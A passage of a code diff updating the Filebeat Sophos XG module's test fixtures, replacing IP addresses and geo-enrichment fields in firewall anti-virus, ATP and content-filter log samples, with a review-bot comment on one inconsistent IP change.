src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.18 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=82.165.194.211 src_country_code=DEU 
dst_ip=186.8.209.194 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" -<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=1.128.3.4 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" 
to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=216.160.83.61 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" <30>device="SFW" date=2018-06-06 time=10:51:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036106211001 log_type="Anti-Virus" log_component="POPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="pankhil@postman.local" subject="EICAR" mailid="" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=10:58:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036206212001 log_type="Anti-Virus" log_component="IMAPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="ganga@postman.local" subject="EICAR test email" mailid="<2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local>" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-21 time=19:50:23 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031006209001 log_type="Anti-Virus" log_component="FTP" 
log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" virus="EICAR-AV-Test" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Upload" filename=" /home/ftp-user/ta_test_file_1ta-cl1-46" file_size=0 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" ftpcommand="STOR" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol="TCP" src_port=39910 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=0 diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json index 4a59a7c79257..70d803619d12 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json @@ -4,17 +4,7 @@ "client.bytes": 550, "client.ip": "172.16.34.24", "client.port": 57695, - "destination.as.number": 16509, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 1616, - "destination.geo.city_name": "Seattle", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 47.6348, - "destination.geo.location.lon": -122.3451, - "destination.geo.region_iso_code": "US-WA", - "destination.geo.region_name": "Washington", "destination.ip": "13.226.155.93", "destination.port": 80, "event.action": "Virus", 
@@ -88,17 +78,7 @@ "client.bytes": 541, "client.ip": "172.16.34.24", "client.port": 57835, - "destination.as.number": 16509, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 553, - "destination.geo.city_name": "Seattle", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 47.6348, - "destination.geo.location.lon": -122.3451, - "destination.geo.region_iso_code": "US-WA", - "destination.geo.region_name": "Washington", "destination.ip": "13.226.155.18", "destination.port": 80, "event.action": "Virus", @@ -170,16 +150,9 @@ { "@timestamp": "2020-05-18T14:38:35.000-02:00", "client.bytes": 0, - "client.ip": "82.165.194.211", + "client.ip": "1.128.3.4", "client.port": 56336, - "destination.as.number": 19422, - "destination.as.organization.name": "Telefonica Moviles del Uruguay SA", "destination.bytes": 0, - "destination.geo.continent_name": "South America", - "destination.geo.country_iso_code": "UY", - "destination.geo.country_name": "Uruguay", - "destination.geo.location.lat": -33.0, - "destination.geo.location.lon": -56.0, "destination.ip": "186.8.209.194", "destination.port": 25, "destination.user.email": "info@elastic-user.local", 
@@ -192,7 +165,7 @@ "event.dataset": "sophos.xg", "event.kind": "alert", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=1.128.3.4 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "event.outcome": "success", "event.severity": "2", "event.timezone": "-02:00", 
@@ -215,8 +188,8 @@
 "some_other_host.local"
 ],
 "related.ip": [
- "186.8.209.194",
- "82.165.194.211"
+ "1.128.3.4",
+ "186.8.209.194"
 ],
 "rule.id": "22",
 "server.bytes": 0,
@@ -238,15 +211,10 @@
 "sophos.xg.src_country_code": "DEU",
 "sophos.xg.subject": "ZAHLUNG (PROFORMA INVOICE)",
 "sophos.xg.virus": "TR/AD.AgentTesla.eaz",
- "source.as.number": 8560,
- "source.as.organization.name": "1&1 Ionos Se",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
 "source.bytes": 0,
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 51.2993,
- "source.geo.location.lon": 9.491,
- "source.ip": "82.165.194.211",
+ "source.ip": "1.128.3.4",
 "source.port": 56336,
 "source.user.email": "info@farasamed.com",
 "tags": [
@@ -258,16 +226,9 @@
 {
 "@timestamp": "2020-05-18T14:38:36.000-02:00",
 "client.bytes": 0,
- "client.ip": "23.254.247.78",
+ "client.ip": "216.160.83.61",
 "client.port": 54693,
- "destination.as.number": 42652,
- "destination.as.organization.name": "inexio Informationstechnologie und Telekommunikation Gmbh",
 "destination.bytes": 0,
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "DE",
- "destination.geo.country_name": "Germany",
- "destination.geo.location.lat": 51.2993,
- "destination.geo.location.lon": 9.491,
 "destination.ip": "185.7.209.194",
 "destination.port": 25,
 "destination.user.email": "info@elastic-user.local",
@@ -280,7 +241,7 @@
 "event.dataset": "sophos.xg",
 "event.kind": "alert",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"<20200519072944.AFCA295AF2A037A6@divella.it>\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"<20200519072944.AFCA295AF2A037A6@divella.it>\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=216.160.83.61 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"",
 "event.outcome": "success",
 "event.severity": "2",
 "event.timezone": "-02:00",
@@ -293,7 +254,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "critical",
- "log.offset": 2118,
+ "log.offset": 2113,
 "network.transport": "TCP",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -304,7 +265,7 @@
 ],
 "related.ip": [
 "185.7.209.194",
- "23.254.247.78"
+ "216.160.83.61"
 ],
 "rule.id": "22",
 "server.bytes": 0,
@@ -326,18 +287,17 @@
 "sophos.xg.src_country_code": "USA",
 "sophos.xg.subject": "Re: NEW PRO-FORMA INVOICE",
 "sophos.xg.virus": "Mal/BredoZp-B",
- "source.as.number": 54290,
- "source.as.organization.name": "Hostwinds LLC.",
+ "source.as.number": 209,
 "source.bytes": 0,
- "source.geo.city_name": "Seattle",
+ "source.geo.city_name": "Milton",
 "source.geo.continent_name": "North America",
 "source.geo.country_iso_code": "US",
 "source.geo.country_name": "United States",
- "source.geo.location.lat": 47.4902,
- "source.geo.location.lon": -122.3004,
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
 "source.geo.region_iso_code": "US-WA",
 "source.geo.region_name": "Washington",
- "source.ip": "23.254.247.78",
+ "source.ip": "216.160.83.61",
 "source.port": 54693,
 "source.user.email": "spedizioni@divella.it",
 "tags": [
@@ -377,7 +337,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "critical",
- "log.offset": 2867,
+ "log.offset": 2862,
 "network.transport": "TCP",
 "observer.product": "XG",
 "observer.serial_number": "S4000806149EE49",
@@ -451,7 +411,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "critical",
- "log.offset": 3583,
+ "log.offset": 3578,
 "network.transport": "TCP",
 "observer.product": "XG",
 "observer.serial_number": "S4000806149EE49",
@@ -527,7 +487,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "critical",
- "log.offset": 4309,
+ "log.offset": 4304,
 "network.transport": "TCP",
 "observer.product": "XG",
 "observer.serial_number": "SFDemo-2df0960",
@@ -597,7 +557,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 4959,
+ "log.offset": 4954,
 "network.transport": "TCP",
 "observer.product": "XG",
 "observer.serial_number": "SFDemo-2df0960",
diff --git a/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json
index 7db8e56d00f2..8bfa784dcae3 100644
--- a/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json
@@ -3,13 +3,6 @@
 "@timestamp": "2017-01-31T18:44:31.000-02:00",
 "client.ip": "10.198.47.71",
 "client.port": 22623,
- "destination.as.number": 44050,
- "destination.as.organization.name": "Petersburg Internet Network ltd.",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "RU",
- "destination.geo.country_name": "Russia",
- "destination.geo.location.lat": 55.7386,
- "destination.geo.location.lon": 37.6068,
 "destination.ip": "46.161.30.47",
 "destination.port": 80,
 "event.action": "drop",
@@ -75,16 +68,6 @@
 "@timestamp": "2020-05-18T14:38:34.000-02:00",
 "client.ip": "172.16.34.24",
 "client.port": 57579,
- "destination.as.number": 16509,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Seattle",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 47.6348,
- "destination.geo.location.lon": -122.3451,
- "destination.geo.region_iso_code": "US-WA",
- "destination.geo.region_name": "Washington",
 "destination.ip": "13.226.155.22",
 "destination.port": 80,
 "event.action": "drop",
@@ -150,16 +133,6 @@
 "@timestamp": "2020-05-18T14:38:35.000-02:00",
 "client.ip": "172.16.34.24",
 "client.port": 57540,
- "destination.as.number": 16509,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Seattle",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 47.6348,
- "destination.geo.location.lon": -122.3451,
- "destination.geo.region_iso_code": "US-WA",
- "destination.geo.region_name": "Washington",
 "destination.ip": "13.226.155.22",
 "destination.port": 80,
 "event.action": "drop",
@@ -225,13 +198,6 @@
 "@timestamp": "2018-06-05T08:49:00.000-02:00",
 "client.ip": "10.198.32.89",
 "client.port": 0,
- "destination.as.number": 31400,
- "destination.as.organization.name": "Accelerated IT Services & Consulting GmbH",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "DE",
- "destination.geo.country_name": "Germany",
- "destination.geo.location.lat": 51.2993,
- "destination.geo.location.lon": 9.491,
 "destination.ip": "82.211.30.202",
 "destination.port": 0,
 "event.action": "alert",
diff --git a/x-pack/filebeat/module/sophos/xg/test/cfilter.log b/x-pack/filebeat/module/sophos/xg/test/cfilter.log
index 2e4796c35414..2cbc3304fe39 100644
--- a/x-pack/filebeat/module/sophos/xg/test/cfilter.log
+++ b/x-pack/filebeat/module/sophos/xg/test/cfilter.log
@@ -1,9 +1,9 @@
 <30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=182.79.221.19 protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason=""
-<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=""
-<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message=""
+<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 
log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=216.160.83.57 dst_ip=216.58.197.44 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=""
+<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=216.160.83.57 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message=""
 <30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.10 dst_ip=13.79.168.201 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer=""
<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://40.90.137.127/" contenttype="" override_token="" httpresponsecode="" src_ip=172.16.34.15 dst_ip=40.90.137.127 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=40.90.137.127 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer=""
-<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer=""
+<30>device="SFW" date=2020-05-18 time=14:38:53 
timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=1.128.3.4 dst_ip=91.228.167.133 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer=""
 <30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SF01V" device_id=1234567890123456 log_id=058420116010 log_type="Content Filtering" log_component="Web Content Policy" log_subtype="Alert" user="gi123456" src_ip=10.108.108.49 transaction_id="e4a127f7-a850-477c-920e-a471b38727c1" dictionary_name="complicated_Custom" site_category=Information Technology website="ta-web-static-testing.qa. 
astaro.de" direction="in" action="Deny" file_name="cgi_echo.pl" context_match="Not" context_prefix="blah blah hello " context_suffix=" hello blah "
 <30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.189.147 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason=""
 <30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.188.94 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname="Search" reason="not eligible"
diff --git a/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json
index 9b6015900c79..6169a070cd57 100644
--- a/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json
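Review bot: The third replaced line in this hunk (the 2020-05-18 14:38:53 `update.eset.com` record) changes `src_ip=172.17.34.15`, an RFC 1918 address, to the public test address `1.128.3.4`, while the neighbouring internal clients `172.17.34.10` and `172.16.34.15` keep their private addresses. If the purpose of the commit was to move real public addresses in fixtures into reserved test ranges, this line did not need to change, and the swap turns an internal-client record into an external one, which is why cfilter.log-expected.json now gains `source.as.number` and `source.as.organization.name` for it. Restoring `src_ip=172.17.34.15` on the new line (and in the matching `event.original` in the expected file) would keep the scenario an internal client and avoid asserting ASN enrichment on a private source. Separately, the two 2017-02-01 lines keep `src_country_code=DEU` next to an address the expected file now geolocates to the US; the expected output still carries `sophos.xg.src_country_code: DEU` unchanged, so this is only a fixture-consistency nit worth a short comment in the test's notes.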
@@ -3,13 +3,6 @@
 "@timestamp": "2017-01-31T14:03:33.000-02:00",
 "client.ip": "10.198.47.71",
 "client.port": 9444,
- "destination.as.number": 9498,
- "destination.as.organization.name": "BHARTI Airtel Ltd.",
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "IN",
- "destination.geo.country_name": "India",
- "destination.geo.location.lat": 20.0,
- "destination.geo.location.lon": 77.0,
 "destination.ip": "182.79.221.19",
 "destination.port": 443,
 "event.action": "allowed",
@@ -78,18 +71,8 @@
 },
 {
 "@timestamp": "2017-02-01T18:20:21.000-02:00",
- "client.ip": "5.5.5.15",
+ "client.ip": "216.160.83.57",
 "client.port": 46719,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.city_name": "Mountain View",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.4043,
- "destination.geo.location.lon": -122.0748,
- "destination.geo.region_iso_code": "US-CA",
- "destination.geo.region_name": "California",
 "destination.ip": "216.58.197.44",
 "destination.port": 80,
 "event.action": "denied",
@@ -101,7 +84,7 @@
 "event.dataset": "sophos.xg",
 "event.kind": "alert",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion & Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"",
